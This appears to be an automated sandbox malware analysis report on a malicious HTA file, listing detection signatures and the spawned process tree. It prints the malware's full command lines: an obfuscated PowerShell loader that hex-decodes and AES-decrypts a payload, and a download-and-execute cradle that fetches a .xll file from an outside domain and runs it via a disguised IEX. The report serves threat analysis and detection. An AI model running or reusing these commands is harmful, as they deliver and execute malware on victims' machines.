Windows
Analysis Report
lalaloopy.hta
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
mshta.exe (PID: 6816 cmdline:
mshta.exe "C:\Users\ user\Deskt op\lalaloo py.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) powershell.exe (PID: 7156 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w h -ep U nrestricte d -nop fun ction Kvft J($weHZ){- split($weH Z -replace '..', '0x $& ')};$Un MqFGPoo=Kv ftJ('62098 6383D3DFAD 70991FFD7F E68BB1A4C7 AAAF28C506 BCDF3F15F0 5FF68BE3A6 3C41C13440 30F279BA09 9867889EC4 0A13815F6C 3AA7DB7914 80C369C067 95CBF5C712 3F25167743 4E1D735ADD 7491972A4B 8BB7C72126 D19B19FA0F 5CC454183B 5CA613DB97 49B7A057F4 6C7D498C1B 093495CAEE 0D3E9A11FC 6A4151C601 E17EE56730 11BDBA93FD E02DE78223 3A7043BF49 654B970ADA E05C1330E6 A3199124AE F9374B3A99 3D86DD9FEE 616A971A56 25F90C5378 E5B92A2241 DD728E9BDA 3166561899 51D0B7C26D 79C0709FEB F5245E7EFD 6B6E6CB91E CB4FF1C782 878D4FADD9 37AEEB5925 AF95C6AFF5 FAB094BAD6 72D12D47A7 BB427EFAE8 35F7CDD461 14FA053129 2DCB1A8250 8ECF719EDE C6D556A601 0E5E3F8285 C641DF9888 7510875500 BD33B137A1 14B9AE1E8F FD7BFD38CD 20E845F94E 6ECA7240E7 DD766768DE 3358011508 5BB1BF7BE7 54CA76DFB2 5FBB67F1FD 69B68F02AB E7E019CBD1 6A364DA8B0 2F2EB10A0D 3077229356 FA8DD4CA57 A654CDA196 E6BE7057EC 0E026CA0F3 254288FEE7 D7852C8A0C 4F5EEFA4AF CFFE45E5CF 2DE47A7148 7A38D65C02 43902C7D78 CF4F213D43 497DD7AB9E 9807CDBF3F 223C051810 449AABD687 C068E56FDA 923D53253D 5E025AD605 FD5794135C FE260E673F 8BCA9A110F 0A3F19479D EDED55D4CE C120D4F50A 2A96F594CC BD88BA8322 6B73962DFE F39766364C E4F5FDC9A9 CA599D61A6 BCEF948A06 43BC72BD33 5FFB29C45E B66186289C 3F3A23987D 3FFC2FC048 F4B82E039C F4B61');$A wWt=-join [char[]](( [Security. Cryptograp hy.Aes]::C reate()).C reateDecry ptor((Kvft J('6856774 14C7863477 477484E4E4 84643')),[ byte[]]::n ew(16)).Tr ansformFin alBlock($U nMqFGPoo,0 ,$UnMqFGPo o.Length)) ; & $AwWt. Substring( 0,3) $AwWt .Substring (3) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 6204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 564 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -Executio nPolicy Un restricted -Command ([System.N et.WebClie nt]::New() .DownloadS tring('htt ps://x72.e ioae.shop/ 413a42a4c7 15693c37e5 256e144fd7 6cc51160b7 4617024d.x ll'))|&( ( [String]'' .Chars)[15 ,24,19]-Jo in'') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 2280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |